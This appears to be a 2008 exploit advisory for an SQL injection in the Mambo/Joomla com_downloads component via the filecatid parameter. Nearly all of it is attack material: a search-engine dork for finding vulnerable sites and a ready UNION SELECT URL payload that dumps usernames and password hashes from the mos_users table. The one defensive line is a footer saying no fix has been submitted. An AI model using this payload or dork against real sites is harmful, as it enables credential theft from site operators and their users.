Mambo Component com_downloads Remote SQL Injection Vulnerability
2008-02-06 00:00:00#########################################################################
#
# joomla SQL Injection(com_downloads)(filecatid)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl :"com_downloads"filecatid
#
##########################################################################
EXPLOIT :
index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
##########################################################################
# S@BUN www.hackturkiye.com S@BUN
##########################################################################
# S@BUN i AM NOT HACKER S@BUN
##########################################################################
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.